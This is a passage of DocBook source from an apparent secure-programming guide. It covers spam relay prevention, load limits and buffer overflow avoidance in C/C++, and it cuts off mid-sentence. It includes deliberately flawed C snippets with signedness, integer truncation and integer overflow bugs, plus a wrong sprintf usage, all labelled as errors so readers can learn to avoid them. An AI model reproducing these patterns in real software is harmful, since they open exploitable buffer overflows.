Spam receivers and intermediaries bear most of the cost
|
||
of spam, while the spammer spends very little to send it.
|
||
Therefore many people regard spam as a theft of service, not just some
|
||
harmless activity, and that number increases as the amount of
|
||
spam increases.
|
||
</para>
|
||
<para>
|
||
If your program can be used to generate email sent to others
|
||
(such as a mail transfer agent, generator of data sent by email, or
|
||
a mailing list manager),
|
||
be sure to write your program to prevent its unauthorized use as a
|
||
mail relay.
|
||
A program should usually only allow legitimate authorized users
|
||
to send email to others (e.g., those inside that company's mail server
|
||
or those legitimately subscribed to the service).
|
||
More information about this is in
|
||
<ulink url="http://www.faqs.org/rfcs/rfc2505.html">IETF RFC 2505</ulink>
|
||
Also, if you manage a mailing list, make sure that it can enforce the
|
||
rule that only subscribers can post to the list, and create a ``log in''
|
||
feature that will make it somewhat harder for spammers to subscribe, spam, and
|
||
unsubscribe easily.
|
||
</para>
|
||
<para>
|
||
One way to more directly counter SPAM is to incorporate support for the
|
||
MAPS (Mail Abuse Prevention System LLC) RBL (Realtime Blackhole List),
|
||
which maintains in real-time
|
||
a list of IP addresses where SPAM is known to originate.
|
||
For more information, see
|
||
<ulink url="http://mail-abuse.org/rbl/">http://mail-abuse.org/rbl/</ulink>.
|
||
Many current Mail Transfer Agents (MTAs) already support the RBL;
|
||
see their websites for how to configure them.
|
||
The usual way to use the RBL is to simply refuse to accept any requests
|
||
from IP addresses in the blackhole list;
|
||
this is harsh, but it solves the problem.
|
||
Another similar service is the Open Relay Database (ORDB) at
|
||
<ulink url="http://ordb.org">http://ordb.org</ulink>, which identifies
|
||
dynamically those sites that permit open email relays
|
||
(open email relays are misconfigured email servers that allow spammers to
|
||
send email through them).
|
||
Another location for more information is
|
||
<ulink url="http://www.spews.org">SPEWS</ulink>.
|
||
I believe there are other similar services as well.
|
||
</para>
|
||
<para>
|
||
I suggest that many systems and programs,
|
||
by default, enable spam blocking if they
|
||
can send email on to others whose identity is under control
|
||
of a remote user - and that includes MTAs.
|
||
At the least, consider this.
|
||
There are real problems with this suggestion, of course -
|
||
you might (rarely) inhibit communication with a legitimate user.
|
||
On the other hand, if you don't block spam, then it's likely that everyone
|
||
<emphasis>else</emphasis> will blackhole your system
|
||
(and thus ignore your emails).
|
||
It's not a simple issue, because no matter what you do, some people
|
||
will not allow you to send them email.
|
||
And of course, how well do you trust the organization keeping up the
|
||
real-time blackhole list - will they add truly innocent sites to the
|
||
blackhole list, and will they remove sites from the blackhole list
|
||
once all is okay?
|
||
Thus, it becomes a trade-off - is it more important to talk to spammers
|
||
(and a few innocents as well), or is it more important to talk to
|
||
those many other systems with spam blocks
|
||
(losing those innocents who share equipment with spammers)?
|
||
Obviously, this must be configurable.
|
||
This is somewhat controversial advice, so consider your options for
|
||
your circumstance.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="limit-time">
|
||
<title>Limit Valid Input Time and Load Level</title>
|
||
|
||
<para>
|
||
Place time-outs and load level limits, especially on incoming network data.
|
||
Otherwise, an attacker might be able to easily cause a denial of service
|
||
by constantly requesting the service.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="buffer-overflow">
|
||
<title>Avoid Buffer Overflow</title>
|
||
|
||
<epigraph>
|
||
<attribution>Amos 3:11 (NIV)</attribution>
|
||
<para>
|
||
An enemy will overrun the land;
|
||
he will pull down your strongholds and
|
||
plunder your fortresses.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
An extremely common security flaw is vulnerability to a ``buffer overflow''.
|
||
Buffer overflows are also called ``buffer overruns'', and there are
|
||
many kinds of buffer overflow attacks (including
|
||
``stack smashing'' and ``heap smashing'' attacks).
|
||
Technically, a buffer overflow is a problem with the program's internal
|
||
implementation, but it's such a common and serious problem that
|
||
I've placed this information in its own chapter.
|
||
To give you an idea of how important this subject is,
|
||
at the CERT, 9 of 13 advisories in 1998 and at least half of
|
||
the 1999 advisories involved buffer overflows.
|
||
An informal 1999 survey on Bugtraq found that approximately 2/3 of the
|
||
respondents felt that buffer overflows were the leading cause of
|
||
system security vulnerability (the remaining respondents identified
|
||
``mis-configuration'' as the leading cause) [Cowan 1999].
|
||
This is an old, well-known problem, yet it continues to resurface
|
||
[McGraw 2000].
|
||
<!-- ???: Get the stats from the libsafe paper -->
|
||
</para>
|
||
|
||
<para>
|
||
A buffer overflow occurs when you write a set of values
|
||
(usually a string of characters) into a fixed length buffer
|
||
and write at least one value outside that buffer's boundaries
|
||
(usually past its end).
|
||
A buffer overflow can occur when reading input from the user into a buffer,
|
||
but it can also occur during other kinds of processing in a program.
|
||
</para>
|
||
|
||
<para>
|
||
If a secure program permits a buffer overflow, the overflow can often be
|
||
exploited by an adversary.
|
||
If the buffer is a local C variable, the overflow can be used to
|
||
force the function to run code of an attackers' choosing.
|
||
This specific variation is often called a ``stack smashing'' attack.
|
||
A buffer in the heap isn't much better; attackers may be able to
|
||
use such overflows to control other variables in the program.
|
||
More details can be found from Aleph1 [1996], Mudge [1995], LSD [2001],
|
||
or the Nathan P. Smith's
|
||
"Stack Smashing Security Vulnerabilities" website at
|
||
<ulink
|
||
url="http://destroy.net/machines/security/">http://destroy.net/machines/security/</ulink>.
|
||
A discussion of the problem and some ways to counter them is given
|
||
by Crispin Cowan et al, 2000, at
|
||
<ulink url="http://immunix.org/StackGuard/discex00.pdf">
|
||
http://immunix.org/StackGuard/discex00.pdf</ulink>.
|
||
<!--
|
||
Buffer Overflows:
|
||
Attacks and Defenses for the Vulnerability of the Decade.
|
||
Crispin Cowan, Perry Wagle, Calton Pu,
|
||
Steve Beattie, and Jonathan Walpole
|
||
Department of Computer Science and Engineering
|
||
Oregon Graduate Institute of Science & Technology
|
||
|
||
It appeared at the DARPA DISCEX conference
|
||
http://schafercorp-ballston.com/discex, and again as an invited talk
|
||
at the SANS 2000 conference http://www.sans.org/sans2000/sans2000.htm
|
||
|
||
-->
|
||
A discussion of the problem and some ways to counter them in Linux
|
||
is given by
|
||
Pierre-Alain Fayolle and Vincent Glaume
|
||
at
|
||
<ulink url="http://www.enseirb.fr/~glaume/indexen.html">
|
||
http://www.enseirb.fr/~glaume/indexen.html</ulink>.
|
||
<!-- A Buffer Overflow Study
|
||
Attacks & Defenses
|
||
-->
|
||
<!--
|
||
|
||
On Bugtraq:
|
||
Subject: Re: A buffer overflow study - generic protections
|
||
From: Crispin Cowan <crispin@wirex.com>
|
||
Date: Tue, 02 Apr 2002 14:02:15 -0800
|
||
To: bugtraq@securityfocus.com
|
||
|
||
The similarities [of these two papers]
|
||
are substantial: we also categorized the attack space
|
||
(kinds of buffer overflows), surveyed the defenses, and considered
|
||
optimal combinations of defenses to get good coverage at reasonable
|
||
cost. Differences:
|
||
|
||
* Our survey was much broader. We covered:
|
||
* Non-executable buffers (i.e. Solar Designer's non-executable
|
||
stack patch, and a similar feature in Solaris)
|
||
* Array bunds checking (Compaq's ccc compiler, and the bounds
|
||
checking GCC built by Jones & Kelly and maintained by Herman
|
||
ten Brugge, Purify, and type safe languages such as Java)
|
||
* Code pointer integrity checking (StackGuard, and the
|
||
hand-coded stack introspection that Snarskii built into
|
||
FreeBSD's libc)
|
||
* We did not cover:
|
||
* libsafe: it did not exist at the time
|
||
* grsecurity: it is just a derivative of Solar Designer's work
|
||
* PAX: it did not exist at the time
|
||
* Prelude: I don't understand how a general purpose host
|
||
intrusion detection system bears on a survey of buffer overflows
|
||
* Stack Shield: it is just a weak immitation of StackGuard,
|
||
with no advantages, and substantial disadvantages
|
||
* We came to a somewhat similar conclusion: that a combination of
|
||
tools was the ideal defense. However, our preferred combo was
|
||
StackGuard + Solar Designer's non-executable stack patch, which is
|
||
what we actually ship in Immunix.
|
||
* StackGuard offers the best resistance to "stack smashing"
|
||
attacks
|
||
* Non-executable stack segments offer substantial resistance
|
||
to code injection (payload)
|
||
* The two techniques are transparently compatible, and the
|
||
combined performance overhead is nearly zero
|
||
* As above, we did not consider PAX, but we would still not recomend
|
||
it for most applications: the 10% macrobenchmark performance hit
|
||
is pretty high.
|
||
* We are mystified why Vincent et al recomend Stack Shield instead
|
||
of StackGuard: Stack Shield offers no advantages (it is not more
|
||
secure and it is not faster) and is much more problematic to deploy.
|
||
* Libsafe vs. StackGuard or Stack Shield is a true decision: Libsafe
|
||
is incompatible with compiler techniques that munge the call stack
|
||
(and incompatible with -fno-frame-pointer) so you have to choose
|
||
one or the other
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
Most high-level programming languages are essentially
|
||
immune to this problem, either
|
||
because they automatically resize arrays (e.g., Perl), or because they normally
|
||
detect and prevent buffer overflows (e.g., Ada95).
|
||
However, the C language provides no protection against
|
||
such problems, and C++ can be easily used in ways to cause this problem too.
|
||
Assembly language also provides no protection, and some languages
|
||
that normally include such protection (e.g., Ada and Pascal) can have
|
||
this protection disabled (for performance reasons).
|
||
Even if most of your program is written in another language,
|
||
many library routines are written in C or C++, as well as ``glue'' code to
|
||
call them, so other languages often don't provide as complete a protection
|
||
from buffer overflows as you'd like.
|
||
</para>
|
||
|
||
<sect1 id="dangers-c">
|
||
<title>Dangers in C/C++</title>
|
||
|
||
<para>
|
||
C users must avoid using dangerous functions that do not check bounds
|
||
unless they've ensured that the bounds will never get exceeded.
|
||
Functions to avoid in most cases (or ensure protection) include
|
||
the functions strcpy(3), strcat(3), sprintf(3)
|
||
(with cousin vsprintf(3)), and gets(3).
|
||
These should be replaced with functions such as strncpy(3), strncat(3),
|
||
snprintf(3), and fgets(3) respectively, but see the discussion below.
|
||
The function strlen(3) should be avoided unless you can ensure that there
|
||
will be a terminating NIL character to find.
|
||
The scanf() family (scanf(3), fscanf(3), sscanf(3), vscanf(3),
|
||
vsscanf(3), and vfscanf(3)) is often dangerous to use; do not use it
|
||
to send data to a string without controlling the maximum length
|
||
(the format %s is a particularly common problem).
|
||
Other dangerous functions that may permit buffer overruns (depending on their
|
||
use) include
|
||
realpath(3), getopt(3), getpass(3),
|
||
streadd(3), strecpy(3), and strtrns(3).
|
||
You must be careful with getwd(3); the buffer sent to getwd(3) must be
|
||
at least PATH_MAX bytes long.
|
||
The select(2) helper macros
|
||
FD_SET(), FD_CLR(), and FD_ISSET() do not check that the index fd
|
||
is within bounds; make sure that fd >= 0 and fd <= FD_SETSIZE
|
||
(this particular one has been exploited in pppd).
|
||
</para>
|
||
|
||
<para>
|
||
Unfortunately, snprintf()'s variants have additional problems.
|
||
Officially, snprintf() is not a standard C function in the ISO 1990
|
||
(ANSI 1989) standard, though sprintf() is,
|
||
so not all systems include snprintf().
|
||
Even worse, some systems' snprintf() do not actually protect
|
||
against buffer overflows; they just call sprintf directly.
|
||
Old versions of Linux's libc4 depended on a ``libbsd'' that did this
|
||
horrible thing, and I'm told that some old HP systems did the same.
|
||
Linux's current version of snprintf is known to work correctly, that is, it
|
||
does actually respect the boundary requested.
|
||
The return value of snprintf() varies as well;
|
||
the Single Unix Specification (SUS) version 2
|
||
and the C99 standard differ on what is returned by snprintf().
|
||
Finally, it appears that at least some versions of
|
||
snprintf don't guarantee that its string will end in NIL; if the
|
||
string is too long, it won't include NIL at all.
|
||
Note that the glib library (the basis of GTK, and not the same as the
|
||
GNU C library glibc) has a g_snprintf(), which
|
||
has a consistent return semantic, always NIL-terminates, and
|
||
most importantly always respects the buffer length.
|
||
<!-- libsafe protects:
|
||
[vf]scanf(const char *format, ...)
|
||
May overflow its arguments.
|
||
realpath(char *path, char resolved_path[])
|
||
May overflow the path buffer.
|
||
[v]sprintf(char *str, const char *format, ...)
|
||
May overflow the str buffer.
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
Of course, the problem is more than just calling string functions poorly.
|
||
Here are a few additional examples of types of buffer overflow problems,
|
||
graciously suggested by Timo Sirainen, involving manipulation of
|
||
numbers to cause buffer overflows.
|
||
<!-- http://irccrew.org/~cras/security/flaws.html -->
|
||
</para>
|
||
|
||
<para>
|
||
First, there's the problem of signedness.
|
||
If you read data that affects the buffer size,
|
||
such as the "number of characters to be read,"
|
||
be sure to check if the number is less than zero or one.
|
||
Otherwise, the negative number may be cast to an unsigned number,
|
||
and the resulting large positive number
|
||
may then permit a buffer overflow problem.
|
||
Note that sometimes an attacker can provide a large positive number and
|
||
have the same thing happen;
|
||
in some cases, the large value will be interpreted as a negative number
|
||
(slipping by the check for large numbers if there's no check
|
||
for a less-than-one value),
|
||
and then be interpreted later into a large positive value.
|
||
|
||
<programlisting>
|
||
<![CDATA[
|
||
/* 1) signedness - DO NOT DO THIS. */
|
||
char *buf;
|
||
int i, len;
|
||
|
||
read(fd, &len, sizeof(len));
|
||
|
||
/* OOPS! We forgot to check for < 0 */
|
||
if (len > 8000) { error("too large length"); return; }
|
||
|
||
buf = malloc(len);
|
||
read(fd, buf, len); /* len casted to unsigned and overflows */
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Here's a second example identified by Timo Sirainen,
|
||
involving integer size truncation.
|
||
Sometimes the different sizes of integers
|
||
can be exploited to cause a buffer overflow.
|
||
Basically, make sure that you don't truncate any integer results used to
|
||
compute buffer sizes.
|
||
Here's Timo's example for 64-bit architectures:
|
||
|
||
<!--
|
||
, showing two cases of this problem - one
|
||
for 32 bit architectures with large file support
|
||
(where the offset values are 64 bits), and another for 64-bit architectures.
|
||
<programlisting>
|
||
/* For 32bit architectures with large file support: */
|
||
|
||
char *buf;
|
||
off_t len;
|
||
|
||
read(fd, &len, sizeof(len));
|
||
|
||
/* we're relying on malloc() to fail with too large values */
|
||
if (len <= 0) { error("invalid length"); return; }
|
||
|
||
/* 64bit off_t gets truncated to 32bit size_t */
|
||
buf = malloc(len);
|
||
read(fd, buf, len);
|
||
-->
|
||
|
||
<programlisting>
|
||
<![CDATA[
|
||
/* An example of an ERROR for some 64-bit architectures,
|
||
if "unsigned int" is 32 bits and "size_t" is 64 bits: */
|
||
|
||
void *mymalloc(unsigned int size) { return malloc(size); }
|
||
|
||
char *buf;
|
||
size_t len;
|
||
|
||
read(fd, &len, sizeof(len));
|
||
|
||
/* we forgot to check the maximum length */
|
||
|
||
/* 64-bit size_t gets truncated to 32-bit unsigned int */
|
||
buf = mymalloc(len);
|
||
read(fd, buf, len);
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Here's a third example from Timo Sirainen, involving integer overflow.
|
||
This is particularly nasty when combined with malloc(); an attacker
|
||
may be able to create a situation where the computed buffer size
|
||
is less than the data to be placed in it.
|
||
Here is Timo's sample:
|
||
<programlisting>
|
||
<![CDATA[
|
||
/* 3) integer overflow */
|
||
char *buf;
|
||
size_t len;
|
||
|
||
read(fd, &len, sizeof(len));
|
||
|
||
/* we forgot to check the maximum length */
|
||
|
||
buf = malloc(len+1); /* +1 can overflow to malloc(0) */
|
||
read(fd, buf, len);
|
||
buf[len] = '\0';
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="library-c">
|
||
<title>Library Solutions in C/C++</title>
|
||
|
||
<para>
|
||
One partial solution in C/C++ is to use library functions that do not have
|
||
buffer overflow problems.
|
||
The first subsection describes the ``standard C library'' solution, which
|
||
can work but has its disadvantages.
|
||
The next subsection describes the general security issues of both
|
||
fixed length and dynamically reallocated approaches to buffers.
|
||
The following subsections describe various alternative libraries,
|
||
such as strlcpy and libmib.
|
||
Note that these don't solve all problems; you still have to code
|
||
extremely carefully in C/C++ to avoid all buffer overflow situations.
|
||
</para>
|
||
|
||
<sect2 id="buffer-standard-solution">
|
||
<title>Standard C Library Solution</title>
|
||
|
||
<para>
|
||
The ``standard'' solution to prevent buffer overflow in C
|
||
(which is also used in some C++ programs)
|
||
is to use the standard C library calls that defend against these problems.
|
||
This approach depends heavily on the standard library functions
|
||
strncpy(3) and strncat(3).
|
||
If you choose this approach, beware: these calls have somewhat surprising
|
||
semantics and are hard to use correctly.
|
||
The function strncpy(3) does not NIL-terminate the destination string
|
||
if the source string length is at least equal to the destination's, so
|
||
be sure to set the last character of the destination string to NIL after
|
||
calling strncpy(3).
|
||
If you're going to reuse the same buffer many times,
|
||
an efficient approach is to tell strncpy() that the buffer is one
|
||
character shorter than it actually is and set the last character to
|
||
NIL once before use.
|
||
Both strncpy(3) and strncat(3) require that you pass
|
||
the amount of space left available, a computation
|
||
that is easy to get wrong (and getting it wrong could permit a
|
||
buffer overflow attack).
|
||
Neither provide a simple mechanism to determine if an overflow has occurred.
|
||
Finally, strncpy(3) has a significant performance penalty compared
|
||
to the strcpy(3) it supposedly replaces,
|
||
because <emphasis remap="it">strncpy(3) NIL-fills the remainder of the destination</emphasis>.
|
||
I've gotten emails expressing surprise over this last point, but this is
|
||
clearly stated in Kernighan and Ritchie second edition
|
||
[Kernighan 1988, page 249], and this behavior is clearly documented in
|
||
the man pages for Linux, FreeBSD, and Solaris.
|
||
This means that just changing from strcpy to strncpy can cause a severe
|
||
reduction in performance, for no good reason in most cases.
|
||
</para>
|
||
|
||
<para>
|
||
Warning!!
|
||
The function strncpy(s1, s2, n) can also be used as
|
||
a way of copying only part of s2, where n is less than strlen(s2).
|
||
When used this way, strncpy() basically provides no protection against
|
||
buffer overflow by itself - you have to take
|
||
separate actions to ensure that n is smaller than the buffer of s1.
|
||
Also, when used this way, strncpy() does not usually add a trailing NIL
|
||
after copying n characters.
|
||
This makes it harder to determine if a program using strncpy() is secure.
|
||
</para>
|
||
|
||
<para>
|
||
<!-- from Hudin Lucian, BUGTRAQ - 29 Jun 2000 -->
|
||
<!-- David A. Wheeler checked it and found that it was WRONG - 18 July 2000 -->
|
||
<!-- Sean Winn reaffirmed this 28 Oct 2000. Wheeler rechecked, and found
|
||
that his code was wrong. Text here was rewritten as a result. -->
|
||
You can also use sprintf() while preventing
|
||
buffer overflows, but you need to be careful when doing so;
|
||
it's so easy to misapply that it's hard to recommend.
|
||
The sprintf control string can contain various conversion specifiers
|
||
(e.g., "%s"), and the control specifiers can have optional
|
||
field width (e.g., "%10s") and precision (e.g., "%.10s") specifications.
|
||
These look quite similar (the only difference is a period)
|
||
but they are very different.
|
||
The field width only
|
||
specifies a <emphasis>minimum</emphasis> length and is
|
||
completely worthless for preventing buffer overflows.
|
||
In contrast, the precision specification specifies the maximum
|
||
length that the particular string may have in its output when
|
||
used as a string conversion specifier - and thus it can be used
|
||
to protect against buffer overflows.
|
||
Note that the precision specification only specifies the total maximum
|
||
length when dealing with a string; it has a different meaning for
|
||
other conversion operations.
|
||
If the size is given as a precision of "*", then you can pass the maximum size
|
||
as a parameter (e.g., the result of a sizeof() operation).
|
||
This is most easily shown by an example - here's the wrong and right
|
||
way to use sprintf() to protect against buffer overflows:
|
||
<programlisting width="61">
|
||
char buf[BUFFER_SIZE];
|
||
sprintf(buf, "%*s", sizeof(buf)-1, "long-string"); /* WRONG */
|
||
sprintf(buf, "%.*s", sizeof(buf)-1, "long-string"); /* RIGHT */
|
||
</programlisting>
|
||
In theory, sprintf() should be very helpful because you can use it
|
||
to specify complex formats.
|
||
Sadly, it's easy to get things wrong with sprintf().
|
||
If the format is complex, you
|
||
need to make sure that the destination is large enough for the largest
|
||
possible size of the <emphasis>entire</emphasis>
|
||
format, but the precision field only controls
|
||
the size of one parameter.
|
||
The "largest possible" value is often hard to determine when a
|
||
complicated output is being created.
|
||
If a program doesn't allocate quite enough space for the longest possible
|
||
combination, a buffer overflow vulnerability may open up.
|
||
Also, sprintf() appends a NUL to the destination
|
||
after the entire operation is complete -
|
||
this extra character is easy to forget and creates an opportunity
|
||
for off-by-one errors.
|
||
So, while this works, it can be painful to use in some circumstances.
|
||
</para>
|
||
<para>
|
||
Also, a quick note about the code above - note that the sizeof()
|
||
operation used the size of an array.
|
||
If the code were changed so that ``buf'' was a pointer to some
|
||
allocated memory, then all ``sizeof()'' operations would have to be
|
||
changed (or sizeof would just measure the size of a pointer, which isn't
|
||
enough space for most values).
|
||
</para>
|
||
|
||
<para>
|
||
The scanf() family is sadly a little murky as well.
|
||
An obvious question is whether or not the maximum width value can
|
||
be used in %s to prevent these attacks.
|
||
There are multiple official specifications for scanf();
|
||
some clearly state that the width parameter is the absolutely largest
|
||
number of characters, while others aren't as clear.
|
||
<!-- IEEE Std 1003.1-2001 is clear that max widths must be implemented,
|
||
http://www.opengroup.org/onlinepubs/007904975/functions/scanf.html;
|
||
the Single Unix Spec is much less clear. -->
|
||
The biggest problem is implementations; modern implementations
|
||
that I know of do support maximum widths, but I cannot say with
|
||
certainty that all libraries properly implement maximum widths.
|
||
The safest approach is to do things yourself in such cases.
|
||
However, few will fault you if you simply use scanf and include the
|
||
widths in the format strings
|
||
(but don't forget to count \0, or you'll get the wrong length).
|
||
If you do use scanf, it's best to include a test in your installation
|
||
scripts to ensure that the library properly limits length.
|
||
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="static-vs-dynamic-buffers">
|
||
<title>Static and Dynamically Allocated Buffers</title>
|
||
|
||
<para>
|
||
Functions such as strncpy
|
||
are useful for dealing with statically allocated buffers.
|
||
This is a programming approach where a buffer is allocated for
|
||
the ``longest useful size'' and then it stays a fixed size from then on.
|
||
The alternative is to dynamically reallocate buffer sizes as you need them.
|
||
It turns out that both approaches have security implications.
|
||
</para>
|
||
|
||
<para>
|
||
<!-- Thanks to Ryan McCabe (thanks.odin@numb.org) for the comment
|
||
that fixed-length buffers have their own exploitable problems. -->
|
||
There is a general security problem when using fixed-length buffers: the fact
|
||
that the buffer is a fixed length may be exploitable.
|
||
This is a problem with strncpy(3) and strncat(3), snprintf(3),
|
||
strlcpy(3), strlcat(3), and other such functions.
|
||
The basic idea is that the attacker sets up a really long string so that,
|
||
when the string is truncated, the final result will be what the
|
||
attacker wanted (instead of what the developer intended).
|
||
Perhaps the string is catenated from several smaller
|
||
pieces; the attacker might make the first piece as long as the entire
|
||
buffer, so all later attempts to concatenate strings do nothing.
|
||
Here are some specific examples:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
Imagine code that calls gethostbyname(3) and, if
|
||
successful, immediately copies hostent->h_name to a
|
||
fixed-size buffer using strncpy or snprintf.
|
||
Using strncpy or snprintf protects against an overflow of an excessively
|
||
long fully-qualified domain name (FQDN), so you might think you're done.
|
||
However, this could result in chopping off the end of the FQDN.
|
||
This may be very undesirable, depending on what happens next.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Imagine code that uses strncpy, strncat, snprintf, etc., to copy the
|
||
full path of a filesystem object to some buffer.
|
||
Further imagine that the original value was provided by an
|
||
untrusted user, and that the copying is part of a process to pass a
|
||
resulting computation to a function.
|
||
Sounds safe, right?
|
||
Now imagine that an attacker pads a path
|
||
with a large number of '/'s at the beginning. This could
|
||
result in future operations being performed on the file ``/''.
|
||
If the program appends values in the belief that the result will be safe,
|
||
the program may be exploitable.
|
||
Or, the attacker could devise a long filename near the buffer length, so that
|
||
attempts to append to the filename would silently fail to occur
|
||
(or only partially occur in ways that may be exploitable).
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
When using statically-allocated buffers,
|
||
you really need to consider the length of the source and destination arguments.
|
||
Sanity checking the input and the resulting intermediate computation might
|
||
deal with this, too.
|
||
</para>
|
||
|
||
<para>
|
||
Another alternative is to dynamically reallocate all strings instead of using
|
||
fixed-size buffers.
|
||
This general approach is recommended by the GNU programming guidelines,
|
||
since it permits programs to handle arbitrarily-sized inputs
|
||
(until they run out of memory).
|
||
Of course, the major problem with dynamically allocated strings is that you
|
||
may run out of memory. The memory may even be exhausted at some other
|
||
point in the program than the portion where you're worried about buffer
|
||
overflows; any memory allocation can fail.
|
||
Also, since dynamic reallocation may cause memory to be inefficiently
|
||
allocated, it is entirely possible to run out of memory even though
|
||
technically there is enough virtual memory available to the program
|
||
to continue.
|
||
In addition, before running out of memory the program will probably
|
||
use a great deal of virtual memory; this can easily result in
|
||
``thrashing'', a situation in which the computer spends all its time
|
||
just shuttling information between the disk and memory (instead of
|
||
doing useful work).
|
||
This can have the effect of a denial of service attack.
|
||
Some rational limits on input size can help here.
|
||
In general, the program must be designed to
|
||
fail safely when memory is exhausted if you use dynamically allocated strings.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="strlcpy">
|
||
<title>strlcpy and strlcat</title>
|
||
|
||
<para>
|
||
An alternative, being employed by OpenBSD, is the
|
||
strlcpy(3) and strlcat(3) functions by Miller and de Raadt [Miller 1999].
|
||
This is a minimalist, statically-sized buffer approach that provides C string
|
||
copying and concatenation with a different (and less error-prone) interface.
|
||
Source and documentation of these functions
|
||
are available under a newer BSD-style open source license at
|
||
<ulink
|
||
url="ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/strlcpy.3">ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/strlcpy.3</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
First, here are their prototypes:
|
||
|
||
<screen width="61">
|
||
size_t strlcpy (char *dst, const char *src, size_t size);
|
||
size_t strlcat (char *dst, const char *src, size_t size);
|
||
</screen>
|
||
|
||
Both strlcpy and strlcat
|
||
take the full size of the destination buffer as a parameter
|
||
(not the maximum number of characters to be copied) and guarantee to
|
||
NIL-terminate the result (as long as size is larger than 0).
|
||
Remember that you should include a byte for NIL in the size.
|
||
</para>
|
||
|
||
<para>
|
||
The strlcpy function copies up to
|
||
size-1 characters from the NUL-terminated string src to dst,
|
||
NIL-terminating the result.
|
||
The strlcat
|
||
function appends the NIL-terminated string
|
||
src to the end of dst.
|
||
It will append at most
|
||
size - strlen(dst) - 1 bytes, NIL-terminating the result.
|
||
</para>
|
||
|
||
<para>
|
||
One minor disadvantage of strlcpy(3) and strlcat(3) is that they are
|
||
not, by default, installed in most Unix-like systems.
|
||
In OpenBSD, they are part of <string.h>.
|
||
This is not that difficult a problem; since they are small functions, you can
|
||
even include them in your own program's source (at least as an option),
|
||
and create a small separate package to load them.
|
||
You can even use autoconf to handle this case automatically.
|
||
If more programs use these functions, it won't be long before these are
|
||
standard parts of Linux distributions and other Unix-like systems.
|
||
Also, these functions have
|
||
been recently added to the ``glib'' library (I submitted the patch
|
||
to do this), so using recent versions of glib makes them available.
|
||
In glib these functions are named g_strlcpy and g_strlcat
|
||
(not strlcpy or strlcat) to be consistent with the glib library
|
||
naming conventions.
|
||
</para>
|
||
|
||
<para>
|
||
Also, strlcat(3) has slightly varying semantics
|
||
when the provided size is 0 or if there are no NIL characters in
|
||
the destination string dst (inside the given number of characters).
|
||
In OpenBSD, if the size is 0, then the destination string's length is
|
||
considered 0.
|
||
Also, if size is nonzero, but there are no NIL characters
|
||
in the destination string (in the size number of characters), then
|
||
the length of the destination is considered equal to the size.
|
||
These rules make handling strings without embedded NILs consistent.
|
||
Unfortunately, at least Solaris doesn't (at this time) obey these rules,
|
||
because they weren't specified in the original documentation.
|
||
I've talked to Todd Miller, and he and I agree that the OpenBSD
|
||
semantics are the correct ones (and that Solaris is incorrect).
|
||
The reasoning is simple: under no condition should strlcat or strlcpy
|
||
ever examine characters in the destination outside of the range of size;
|
||
such access might cause core dumps (from accessing out-of-range memory)
|
||
and even hardware interactions (through memory-mapped I/O).
|
||
Thus, given:
|
||
<screen width="61">
|
||
a = strlcat ("Y", "123", 0);
|
||
</screen>
|
||
The correct answer is 3 (0+3=3), but Solaris will claim the answer is 4
|
||
because it incorrectly looks at characters beyond the "size" length in
|
||
the destination.
|
||
For now, I suggest avoiding cases where the size is 0 or the destination
|
||
has no NIL characters.
|
||
Future versions of glib will hide this difference and always use the OpenBSD
|
||
semantics.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="libmib">
|
||
<title>libmib</title>
|
||
|
||
<para>
|
||
One toolset for C that dynamically reallocates strings automatically
|
||
is the ``libmib allocated string functions'' by
|
||
Forrest J. Cavalier III, available at
|
||
<ulink
|
||
url="http://www.mibsoftware.com/libmib/astring">http://www.mibsoftware.com/libmib/astring</ulink>.
|
||
There are two variations of libmib; ``libmib-open'' appears to be clearly
|
||
open source under its own X11-like license that
|
||
permits modification and redistribution, but redistributions must choose
|
||
a different name, however, the developer states that it
|
||
``may not be fully tested.''
|
||
To continuously get libmib-mature, you must pay for a subscription.
|
||
The documentation is not open source, but it is freely available.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="std-string">
|
||
<title>C++ std::string class</title>
|
||
|
||
<para>
|
||
C++ developers can use the std::string class, which is built into the
|
||
language.
|
||
This is a dynamic approach, as the storage grows as necessary.
|
||
However, it's important to note that if that class's data is turned
|
||
into a ``char *'' (e.g., by using data() or c_str()),
|
||
the possibilities of buffer overflow resurface, so you need to be careful
|
||
when using such methods.
|
||
Note that c_str() always returns a NIL-terminated string, but
|
||
data() may or may not (it's implementation dependent, and most
|
||
implementations do not include the NIL terminator).
|
||
Avoid using data(), and if you must use it, don't be dependent on its format.
|
||
</para>
|
||
|
||
<para>
|
||
Many C++ developers use other string libraries as well, such as
|
||
those that come with other large libraries or even home-grown string libraries.
|
||
With those libraries, be especially careful - many
|
||
alternative C++ string classes
|
||
include routines to automatically convert the class to a ``char *'' type.
|
||
As a result, they can silently introduce buffer overflow vulnerabilities.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="libsafe">
|
||
<title>Libsafe</title>
|
||
|
||
<para>
|
||
Arash Baratloo, Timothy Tsai, and Navjot Singh
|
||
(of Lucent Technologies)
|
||
have developed Libsafe, a wrapper of several library functions known to be
|
||
vulnerable to stack smashing attacks.
|
||
This wrapper (which they call a kind of ``middleware'')
|
||
is a simple dynamically loaded library that contains modified versions
|
||
of C library functions such as strcpy(3).
|
||
These modified versions
|
||
